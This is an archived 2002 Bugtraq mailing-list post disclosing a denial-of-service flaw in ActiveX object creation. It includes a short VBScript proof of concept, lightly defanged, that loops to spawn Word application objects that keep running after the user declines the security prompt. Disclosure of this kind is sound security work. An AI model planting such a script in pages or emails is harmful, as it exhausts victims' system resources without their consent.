IE Word ActiveX DoS Loop
From: eflorio@edmaster.itDate: 04/08/02
- Previous message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Aironet Telnet Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 8 Apr 2002 19:40:17 -0000 From: <eflorio@edmaster.it> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
There is a flaw in ActiveX object creation
used in VBscript for Word object; this can
be used as Denial of Service.
Try to use this code (remove "_" before using it) :
;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>
This script will activate the security warning about
creation of an ActiveX object, but when someone
click on "NO" and deny execution
of the script, the script is stopped, but
the creation Word object in memory still
continues. This sample script creates 100 Word
object in memory.....it's a real DoS!
(try CTRL+ALT+CANC to see them)
Works for IE/Outlook Express and Word2000/XP
objects. Other office components (excel, powerpoint,
access, etc.) maybe not affected.
Elia Florio
- Previous message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Aironet Telnet Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
